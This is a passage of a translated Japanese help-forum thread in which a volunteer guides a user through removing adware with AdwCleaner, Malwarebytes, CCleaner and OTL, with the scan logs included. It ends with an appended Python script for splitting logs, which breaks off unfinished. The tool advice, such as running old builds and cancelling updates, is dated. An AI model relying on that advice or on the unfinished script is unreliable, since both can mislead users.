有効 App Google Search 0.0.0.30 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0
有効 App Google ドライブ 6.4 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0
有効 App YouTube 4.2.7 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0
有効 Extension BlocKUTubEADi 3.2 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0
有効 Extension Dropmark sidebar 171 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\foiapgoppijipmmgkaibacckkhbngfhp\171
有効 Extension Google ドキュメント 0.9 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0
有効 Extension Twitch Stream 207 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjaicoojlfoococemdcaollmhaiolole\207

Scheduled Tasks
有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task avaavxvyex C:\Users\ryota\AppData\Local\avaavxvyex\avaavxvyex.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task Lyrics-Fan Update C:\Program Files (x86)\Lyrics_Fan\lrcsfans.exe /c
有効 Task Microsoft OneDrive Auto Update Task-S-1-5-21-1488747381-3182991089-3951260014-1001 Microsoft Corporation %localappdata%\Microsoft\OneDrive\OneDrive.exe
無効 Task Optimize Start Menu Cache Files-S-1-5-21-1488747381-3182991089-3951260014-1001
有効 Task {0601D1B3-F740-46AF-A550-6AFEBF819572} Microsoft Corporation C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\TKFE\ihs.exe" -c -dir "C:\Program Files (x86)\TKFE\"
有効 Task {1A2DB53E-8396-41D2-8361-E87074E12D6F} Mozilla Corporation "c:\program files (x86)\mozilla firefox\firefox.exe" http://ui.skype.com/ui/0/6.3.0.107/ja/abandoninstall?page=tsProgressBar
有効 Task {9BC57B91-65D9-4D7E-9148-846ED936F68B} Microsoft Corporation C:\Windows\system32\pcalua.exe -a C:\Users\ryota\Desktop\Project64KVE\Project64KVE.exe -d C:\Users\ryota\Desktop\Project64KVE

That is all.
  • かなは
  • 2015/04/04 (Sat) 20:05:05
Please post the AC log
You have posted all of the HJT and CC logs, but it seems the AC log has not been posted yet.
Please post the AC removal log.
  • IVNO
  • MAIL
  • 2015/04/04 (Sat) 20:38:45
Re: I am troubled by pop-ups and ads being forcibly displayed.
Sorry. I got mixed up and forgot to paste it.
The AC log is below.

# AdwCleaner v4.200 - ログファイルの作成日 04/04/2015 作成時間 19:51:45
# 更新日 29/03/2015 作成元 Xplode
# データベース : 2015-03-29.1 [ローカル]
# オペレーティングシステム : Windows 8.1 (x64)
# ユーザー名 : ryota - NAMETUKI
# 実行場所 : C:\Users\ryota\Desktop\adwcleaner_4.200.exe
# オプション : 削除

***** [ サービス ] *****

[#] サービス 削除済み項目 : 2e873f60

***** [ ファイル / フォルダ ] *****

フォルダ 削除済み項目 : C:\ProgramData\Intelewin filter
フォルダ 削除済み項目 : C:\ProgramData\Performance Optimizer
フォルダ 削除済み項目 : C:\ProgramData\634f3b4dc3b0241a
フォルダ 削除済み項目 : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlvPlayer
フォルダ 削除済み項目 : C:\Program Files (x86)\Tweaks
フォルダ 削除済み項目 : C:\Users\ryota\AppData\Roaming\baidu
フォルダ 削除済み項目 : C:\Users\ryota\AppData\Roaming\OpenCandy
フォルダ 削除済み項目 : C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\Extensions\KyK6@ymFhfOn.org
フォルダ 削除済み項目 : C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\Extensions\QoDQ@B.com
フォルダ 削除済み項目 : C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\Extensions\Rw@pKVf9.net
フォルダ 削除済み項目 : C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\Extensions\sK8@H4N8xo.org
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_dlnembnfbcpjnepmfjmngjenhhajpdfd_0.localstorage
ファイル 削除済み項目 : C:\END
ファイル 削除済み項目 : C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\searchplugins\trovi-search.xml
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_firefox.softonic.jp_0.localstorage
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_firefox.softonic.jp_0.localstorage-journal
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_hajimeshiki.blog38.fc2.com_0.localstorage
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_hajimeshiki.blog38.fc2.com_0.localstorage-journal
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_i-funbox.softonic.jp_0.localstorage
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_i-funbox.softonic.jp_0.localstorage-journal
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_jp.hao123.com_0.localstorage
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_jp.hao123.com_0.localstorage-journal
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.tomigaoka-hs.jp_0.localstorage
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.tomigaoka-hs.jp_0.localstorage-journal
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.veoh.com_0.localstorage
ファイル 削除済み項目 : C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.veoh.com_0.localstorage-journal

***** [ スケジュールタスク ] *****

タスク 削除済み項目 : Digital Sites
タスク 削除済み項目 : EPUpdater
タスク 削除済み項目 : Price Meter Updater
タスク 削除済み項目 : pricemeterdownloader
タスク 削除済み項目 : PriceMeterLiveUpdateUpdateTaskMachineCore
タスク 削除済み項目 : PriceMeterLiveUpdateUpdateTaskMachineUA
タスク 削除済み項目 : RegClean Pro
タスク 削除済み項目 : SaveSense
タスク 削除済み項目 : SaveSenseLiveUpdateTaskMachineCore
タスク 削除済み項目 : SaveSenseLiveUpdateTaskMachineUA
タスク 削除済み項目 : SpeedUpMyPC
タスク 削除済み項目 : spmonitor
タスク 削除済み項目 : WOT N
タスク 削除済み項目 : WOT T
タスク 削除済み項目 : WOT W1
タスク 削除済み項目 : WOT W2
タスク 削除済み項目 : WOT WFRI1
タスク 削除済み項目 : WOT WMON1
タスク 削除済み項目 : WOT WTHUR1
タスク 削除済み項目 : WOT WTUE1
タスク 削除済み項目 : WOT WW1
タスク 削除済み項目 : WOT WW2
タスク 削除済み項目 : WOT WWED1

***** [ ショートカット ] *****

ショートカット 駆除済み項目 : C:\Users\ryota\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WorldofTanks.lnk

***** [ レジストリ ] *****

キー 削除済み項目 : HKLM\SOFTWARE\Classes\S
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLive.OneClickCtrl.9
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLive.OneClickProcessLauncherMachine.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLive.Update3WebControl.3
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.CoCreateAsync.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.CoreMachineClass.1
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.CredentialDialogMachine.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.OnDemandCOMClassMachine.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.OnDemandCOMClassMachineFallback.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.ProcessLauncher.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.Update3COMClassService
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.Update3WebMachine.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\SaveSenseLiveUpdate.Update3WebMachineFallback.1.0
キー 削除済み項目 : HKLM\SOFTWARE\Classes\speedupmypc
キー 削除済み項目 : HKLM\SOFTWARE\e1316ce5-ccf0-cdcd-6fb9-2933b402fd24
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{89449F37-4AB2-46ED-A566-BB3A7797701B}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{F509ADC2-B40E-470F-A7B7-45191486B5CB}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{27CE191D-733B-4450-AFCD-096D105288C3}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{30D1E30D-B7F5-4C7A-8EDA-9F02966538A8}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{89449F37-4AB2-46ED-A566-BB3A7797701B}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F509ADC2-B40E-470F-A7B7-45191486B5CB}
キー 削除済み項目 : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
キー 削除済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
キー 削除済み項目 : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\F3A4A002FE7B4E04B8CC3B6516EB89BE
キー 削除済み項目 : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{34A5152D-6D2E-400E-8A6F-4882264D556B}
キー 削除済み項目 : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{4DD7187B-2366-2589-3BF1-3871B30945B3}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{DEC8B1CF-C7B3-40DF-B08A-3449CEA511DC}
キー 削除済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{DEC8B1CF-C7B3-40DF-B08A-3449CEA511DC}
キー 削除済み項目 : HKCU\Software\PriceMeterLiveUpdate
キー 削除済み項目 : HKCU\Software\PriceMeterUpdater
キー 削除済み項目 : HKCU\Software\Softonic
キー 削除済み項目 : HKCU\Software\Baidu
キー 削除済み項目 : HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
キー 削除済み項目 : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
キー 削除済み項目 : HKLM\SOFTWARE\FlvPlayer
キー 削除済み項目 : HKLM\SOFTWARE\PriceMeterLiveUpdate
キー 削除済み項目 : HKLM\SOFTWARE\Uniblue
キー 削除済み項目 : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
キー 削除済み項目 : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}
キー 削除済み項目 : [x64] HKLM\SOFTWARE\Baidu
キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PriceMeterLiveUpdate.exe
キー 削除済み項目 : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com

***** [ Webブラウザ ] *****

-\\ Internet Explorer v11.0.9600.17416

設定 復元済み項目 : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
設定 復元済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
設定 復元済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]

-\\ Mozilla Firefox v37.0.1 (x86 ja)

[huvep8mo.default\prefs.js] - ライン 削除済み項目 : user_pref("browser.newtab.url", "hxxp://www.trovi.com/?gd=&ctid=CT3318522&octid=EB_ORIGINAL_CTID&ISID=M4EE90A50-3AE9-4F68-8525-05C99AEDA898&SearchSource=69&CUI=&SSPV=&Lay=1&UM=6&UP=SP18F052A5-8E24-4DA[...]
[huvep8mo.default\prefs.js] - ライン 削除済み項目 : user_pref("browser.search.defaultenginename", "Trovi search");
[huvep8mo.default\prefs.js] - ライン 削除済み項目 : user_pref("browser.search.selectedEngine", "Trovi search");
[huvep8mo.default\prefs.js] - ライン 削除済み項目 : user_pref("browser.startup.homepage", "hxxp://searchy.easylifeapp.com/");

-\\ Google Chrome v34.0.1847.131

[C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Web Data] - 削除済み項目 [Search Provider] : hxxp://www.softonic.jp/s/{searchTerms}
[C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Preferences] - 削除済み項目 [Homepage] : hxxp://searchy.easylifeapp.com/
[C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Preferences] - 削除済み項目 [Startup_URLs] : hxxp://searchy.easylifeapp.com/

-\\ Comodo Dragon v


-\\ Chrome Canary v


*************************

AdwCleaner[R0].txt - [19876 bytes] - [12/05/2014 00:29:23]
AdwCleaner[R1].txt - [973 bytes] - [13/05/2014 20:20:03]
AdwCleaner[R2].txt - [14101 bytes] - [04/04/2015 19:50:36]
AdwCleaner[S0].txt - [18836 bytes] - [12/05/2014 00:31:09]
AdwCleaner[S1].txt - [1028 bytes] - [13/05/2014 20:21:13]
AdwCleaner[S2].txt - [13124 bytes] - [04/04/2015 19:51:45]

########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [13184 bytes] ##########
  • かなは
  • 2015/04/04 (Sat) 20:42:54
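Remove AC and scan with MBAM
I have checked the AC log, and it is horrendous.
AC is no longer needed, so please launch AC and press the Uninstall button to remove it.

Also, I left out one instruction.
The log from the IE tab in CC was not posted.
Unless this is dealt with as well, those entries will remain,
so please include it the next time you post logs.

There are still entries in the HJT log that need to be dealt with,
but let's handle those with OTL, which I will introduce later.

Please prepare the following software.

Malwarebytes Anti-Malware (commonly called MBAM)
Old version download ↓ (This is a direct link to the file. A download prompt appears a few seconds after the page is displayed.)
http://www.oldapps.com/malwarebytes.php?old_malwarebytes=12090?download
The latest version has problems, such as ceasing to work, so we will use the old version here.
At the end of the installation, uncheck the option to start the free trial of Malwarebytes Anti-Malware Pro.
This software does support Japanese, but the text is garbled on first launch, so please follow the steps below to switch it to Japanese.
Launch MBAM.
An automatic update starts when MBAM launches.
When a message says that the latest version has been downloaded, be sure to press Cancel.
Next, the virus definition update starts, so please wait until it finishes.
Once the virus definitions have been updated, the message saying that the latest version has been downloaded appears again,
so press Cancel again to abort the update.
Once MBAM has started, open the Settings tab and set the Language item to Japanese again to switch the interface to Japanese.
We will not scan at this stage, so close MBAM once the settings are done.
The latest version and the old version are operated very differently,
so please let me know if you happen to have installed version 2.0 or later.
When cleaning up, uninstall it with Geek from Safe Mode.

The edition used here is Free (the no-cost edition).

Once you are ready, we will begin the work.
Launch CC, open each tab under Tools → Startup,
and for each matching entry click Disable and then Delete Entry, in that order.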

Windows
有効 Helper SaverExxtensiion C:\Program Files (x86)\SaverExxtensiion\LyRYa1TqoTYmQU.x64.dll
有効 Helper TakeTHeCoupon C:\Program Files (x86)\TakeTHeCoupon\CWRQMaSXmAvceq.x64.dll

Firefox
有効 Extension AAlllSaveer 1.4 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\Rw@pKVf9.net
有効 Extension DaigiCoupon 5.3 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\QoDQ@B.com
有効 Extension UnIDealsi 2.0 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\KyK6@ymFhfOn.org
有効 Extension youtubeadblocker 1.0 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\sK8@H4N8xo.org

Google Chrome
有効 Extension BlocKUTubEADi 3.2 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0

Scheduled Tasks
有効 Task avaavxvyex C:\Users\ryota\AppData\Local\avaavxvyex\avaavxvyex.exe
有効 Task Lyrics-Fan Update C:\Program Files (x86)\Lyrics_Fan\lrcsfans.exe /c
有効 Task {0601D1B3-F740-46AF-A550-6AFEBF819572} Microsoft Corporation C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\TKFE\ihs.exe" -c -dir "C:\Program Files (x86)\TKFE\"

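For entries that cannot be disabled or are already disabled, go straight to Delete Entry;
if an entry does not exist, leave it and move on.
Likewise, if an entry cannot be deleted, for example under Google Chrome, leave it and move on.
When the work in CC is finished, start the PC in Safe Mode.
Launch MBAM.
Select Full Scan and click Start Scan.
Please wait roughly 30 minutes to an hour and a half for the scan to finish.
When the scan is complete, click Show Details.
A list of detected items appears; to remove all of them,
tick every checkbox to the left of the detected items.
Once everything is ticked, press the Quarantine Selected Items button.
When the removal has been set up you will be prompted to restart the PC, so follow the prompt and restart in normal mode.
A log is produced around the restart, so please paste the log you obtain and report back.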
  • IVNO
  • MAIL
  • 2015/04/04 (Sat) 21:16:17
Re: I am troubled by pop-ups and ads being forcibly displayed.
I have just finished the steps above.
I am pasting the logs below, so please give me instructions.

IE
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Helper SaverExxtensiion C:\Program Files (x86)\SaverExxtensiion\LyRYa1TqoTYmQU.x64.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Helper TakeTHeCoupon C:\Program Files (x86)\TakeTHeCoupon\CWRQMaSXmAvceq.x64.dll


MBAM

Malwarebytes Anti-Malware (試用) 1.75.0.1300
www.malwarebytes.org

定義バージョン: v2013.04.04.07

Windows 8 x64 NTFS (セーフモード)
Internet Explorer 11.0.9600.17690
ryota :: NAMETUKI [管理者]

リアルタイム保護: 無効

2015/04/04 21:41:01
mbam-log-2015-04-04 (21-41-01).txt

スキャンタイプ: フルスキャン (C:\|D:\|E:\|F:\|)
有効なスキャン領域: メモリ | スタートアップ | レジストリ | ファイルシステム | ヒューリスティック/追加アイテムのスキャン  | ヒューリスティック/Shuriken エンジンを使用してスキャン  | 不審なプログラム (PUP) | 不審な変更 (PUM)
無効なスキャン領域: ピア・ツー・ピアプログラム(P2P)
スキャンしたアイテム数: 460260
経過時間: 44 分, 3 秒

メモリプロセスの検出: 0
(悪意のあるアイテムは検出されていません。)

メモリモジュールの検出: 0
(悪意のあるアイテムは検出されていません。)

レジストリキーの検出: 8
HKCR\CLSID\{B83FC273-3522-4CC6-92EC-75CC86678DA4} (Adware.CnsMin) -> 正常に隔離され削除されました。
HKCR\TypeLib\{AAB6BCE3-1DF6-4930-9B14-9CA79DC8C267} (Adware.CnsMin) -> 正常に隔離され削除されました。
HKCR\Interface\{DF692509-D9EF-48A0-9CD0-3AA5B81F6F68} (Adware.CnsMin) -> 正常に隔離され削除されました。
HKCR\CnsHelper.CH.1 (Adware.CnsMin) -> 正常に隔離され削除されました。
HKCR\CnsHelper.CH (Adware.CnsMin) -> 正常に隔離され削除されました。
HKCU\SOFTWARE\3721 (PUP.BitSpirit) -> 正常に隔離され削除されました。
HKLM\SOFTWARE\3721 (PUP.BitSpirit) -> 正常に隔離され削除されました。
HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\!CNS (Adware.CnsMin) -> 正常に隔離され削除されました。

レジストリ値の検出: 2
HKCU\Software\Microsoft\Internet Explorer\Main|CNSReset (Adware.CnsMin) -> データ: 3194082933 -> 正常に隔離され削除されました。
HKCU\Software\Microsoft\Internet Explorer\Main|CNSHint (Adware.CnsMin) -> データ: 1 -> 正常に隔離され削除されました。

レジストリデータ項目の検出: 0
(悪意のあるアイテムは検出されていません。)

フォルダの検出: 0
(悪意のあるアイテムは検出されていません。)

ファイルの検出: 6
C:\Windows\Downloaded Program Files\CnsMin.dll (Adware.CnsMin) -> 正常に隔離され削除されました。
C:\Program Files\JWord_pino\CnsMin.dll (Adware.CnsMin) -> 正常に隔離され削除されました。
C:\Windows\WinSxS\Backup\x86_microsoft-windows-atl_31bf3856ad364e35_6.3.9600.16384_none_3fc0044d754c0225_atl.dll_0c7220db (Trojan.FakeMS) -> 正常に隔離され削除されました。
C:\Windows\WinSxS\x86_microsoft-windows-atl_31bf3856ad364e35_6.3.9600.16384_none_3fc0044d754c0225\atl.dll (Trojan.FakeMS) -> 正常に隔離され削除されました。
C:\Windows\WinSxS\x86_microsoft-windows-vcm-core-codecs_31bf3856ad364e35_6.3.9600.16384_none_01428598f4095f36\iccvid.dll (Trojan.FakeAlert) -> 正常に隔離され削除されました。
C:\Windows\WinSxS\x86_microsoft-windows-vcm-core-codecs_31bf3856ad364e35_6.3.9600.17415_none_018f2074f3cfcbbe\iccvid.dll (Trojan.FakeAlert) -> 正常に隔離され削除されました。

(終)

That is all.
  • かなは
  • 2015/04/04 (Sat) 22:57:43
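So P2P was involved after all
As I mentioned at the very beginning, a P2P file-sharing program was installed:
a BitTorrent client called BitSpirit, which is often used to obtain software illegally.
Only its configuration data was detected, so the program itself may still be lying dormant somewhere.
MBAM is no longer needed, so please remove it following the instructions given when you installed it.

Launch CC, open Tools → Startup → the Internet Explorer tab,
and for the entries below click Disable and then Delete Entry, in that order.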

有効 Helper SaverExxtensiion C:\Program Files (x86)\SaverExxtensiion\LyRYa1TqoTYmQU.x64.dll
有効 Helper TakeTHeCoupon C:\Program Files (x86)\TakeTHeCoupon\CWRQMaSXmAvceq.x64.dll

When the deletion is complete, close CC.
The Windows Defender that ships with Windows performs poorly, so let's arrange separate security software.

Avira Free Antivirus
http://www.avira.com/ja/download?product=avira-free-antivirus

McAfee SiteAdvisor
https://www.siteadvisor.com/

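Avira needs some settings during installation, which I describe below.
Under Select installation type, choose "Custom", accept the agreement, and click Next.
Under Select target folder, just click Next.
Under Install components, also just click Next.
For Avira Community, also just click Next.
For Desktop icon (rest of the title omitted), also just click Next.
Please wait a moment until the installation finishes.
When the installation finishes, a screen titled Welcome to the Configuration Wizard appears; click Next.
Under Configure AHeAD, change the setting to the high detection level and click Next.
Under Select extended threat categories, tick the Select all checkbox and click Next.
Under System scan, just click Next.
Press the Finish button to exit.
After that, install McAfee SiteAdvisor, then close your browser and start it again.
A new add-on will be detected, so please install it.
When that is done, restart the PC once.
After the PC has restarted, launch Avira and click Start update.
Then click the gear icon next to Scan system to bring up the settings.
Change the Files item to All files.
Under Additional settings, tick every item except the bottom one.
Click Apply and then OK to close the settings screen.
Click the Scan system text to run the scan.
When the scan completes, a Report button appears; press it to output the log.
The log may be long, so split it as needed when you reply.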
  • IVNO
  • MAIL
  • 2015/04/05 (Sun) 16:52:05
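Re: I am troubled by pop-ups and ads being forcibly displayed.
I apologize for the delay. For various reasons I could not touch the PC for a long time, so my response was late.
Today I used the PC for the first time in a while, and the symptoms appear to have gotten worse.
I had explained the current situation to my family, but because of my own shortcomings things do not seem to have improved.
From now on I will set rules and make sure no improper use is allowed.

On to the main point:

As I mentioned at the very beginning, a P2P file-sharing program was installed:
a BitTorrent client called BitSpirit, which is often used to obtain software illegally.
Only its configuration data was detected, so the program itself may still be lying dormant somewhere.
MBAM is no longer needed, so please remove it following the instructions given when you installed it.

I do not understand what the response above means, so I would like you to tell me the concrete countermeasures and, if you can tell, where the files mentioned above are located.

Also, after installing AVIRA I do not get the screen that was described.
I am attaching a screenshot, so please take a look.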
  • かなは
  • 2015/04/20 (Mon) 15:40:15
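Then let's look into that as well
The image is too small for me to make out the contents, so let's investigate with some other tools.

Please prepare the following software.

HerdProtect (commonly called HP)
http://www.herdprotect.com/downloads.aspx
Either the installer version or the portable version is fine.
If you use the installer version, uninstall it with Geek in Safe Mode when the time comes.
I have also received reports that it does not get along well with Trend Micro's Virus Buster.
If a compatibility problem prevents the scan from running properly, please let me know.
In addition, not everything this software detects is malware.
HP also has a removal function, but for now we will not remove anything and will use it for detection only.

OldTimer Listit (commonly called OTL)
http://oldtimer.geekstogo.com/OTL.exe
This is a direct link. Save it somewhere easy to find, such as the desktop.
To remove it, launch it and press the "Cleanup" button; it is then deleted automatically.

Once you are ready, first, if you have any extremely large files such as game installers,
manually delete those unneeded files from the PC beforehand and empty them from the Recycle Bin as well.
If HP picks these up as suspicious programs, the scan can easily take a day or two.
Confirm that the PC is running in normal mode, then launch HerdProtect.
By design, this software uses the Internet connection to scan files.
It does not work properly in Safe Mode, where the Internet connection is unavailable,
so if the PC is running in Safe Mode, switch to normal mode.
There is a Scan button; press it to run the scan.
While it gathers the information needed for the scan, or checks suspicious software it has found
against various security products, the scan pauses.
A scan that is not advancing does not mean it has frozen,
so please wait until the scan completes.
When the scan completes, the results are displayed;
click the Save results text at the top right of the screen to output the log.
Give the log any name you like and save it somewhere easy to find.

Copy and paste the following into Notepad.

------Copy from below this line------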
%windir%\tasks\*.job
DRIVES
BASESERVICES
%SYSTEMDRIVE%\*.exe
CREATERESTOREPOINT
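------Copy up to above this line------

When you have pasted it, give the file any name you like and save it somewhere easy to find.
After saving, start the PC in Safe Mode.
Launch OTL and tick Scan All Users at the top center of the window.
Once that is set, paste the contents of the Notepad file you saved earlier into the Custom Scan/Fixes box.
After pasting, close Notepad and click [Run Scan] to run the scan.
The scan takes a few minutes to complete, so please wait.
When the scan completes, OTL.txt and Extras.txt are written to the same location where you saved OTL;
please paste these two along with the HP log you saved earlier in your reply.
Note that, by their nature, both OTL and HP logs tend to be very long.
This board's character limit is about 30,000 characters counted as hiragana, or about 60,000 characters counted as Latin letters.
(More precisely, up to 65,535 bytes in JIS terms, including the subject line: full-width characters and symbols are 2 bytes,
half-width characters and symbols are 1 byte, and special characters such as emoji are 3 bytes.)
You will certainly exceed the limit, so leave some margin and split the logs into parts of roughly 55,000 characters each,
checking with a character counter such as the one at the URL below, when you reply.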
http://www2u.biglobe.ne.jp/~yuichi/rest/strcount.html
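
The post above gives the board's limit as 65,535 bytes including the subject, with per-character costs. The following Python script is an added example, not part of the original thread, that splits a log on line boundaries under that rule. Treating "JIS" counting as cp932, charging each line break as 2 bytes, and the sample log are assumptions.

```python
"""Split a long scan log into board-sized parts without cutting lines."""

BOARD_LIMIT = 65535   # bytes per post, subject included (figure from the post)
SAFE_BUDGET = 55000   # working budget with the margin the post suggests
NEWLINE_COST = 2      # assumption: a line break is submitted as CR+LF


def char_cost(ch: str) -> int:
    """Bytes charged for one character under the rule quoted in the post.

    Assumption: "JIS" counting behaves like Shift_JIS (cp932), so half-width
    characters cost 1, full-width cost 2, and anything cp932 cannot encode
    (emoji and similar) is charged 3.
    """
    try:
        return len(ch.encode("cp932"))
    except UnicodeEncodeError:
        return 3


def _normalize(text: str) -> str:
    """Use a single line-break convention before counting."""
    return text.replace("\r\n", "\n").replace("\r", "\n")


def text_cost(text: str) -> int:
    """Total bytes charged for a string, line breaks included."""
    lines = _normalize(text).split("\n")
    body = sum(char_cost(c) for ln in lines for c in ln)
    return body + NEWLINE_COST * (len(lines) - 1)


def _pieces(line: str, max_cost: int):
    """Yield the line whole, or cut into pieces of at most max_cost bytes."""
    piece, used = [], 0
    for ch in line:
        cost = char_cost(ch)
        if piece and used + cost > max_cost:
            yield "".join(piece)
            piece, used = [], 0
        piece.append(ch)
        used += cost
    yield "".join(piece)


def split_log(log: str, subject: str = "", budget: int = SAFE_BUDGET) -> list:
    """Return parts whose cost plus the subject's cost stays within budget."""
    if budget > BOARD_LIMIT:
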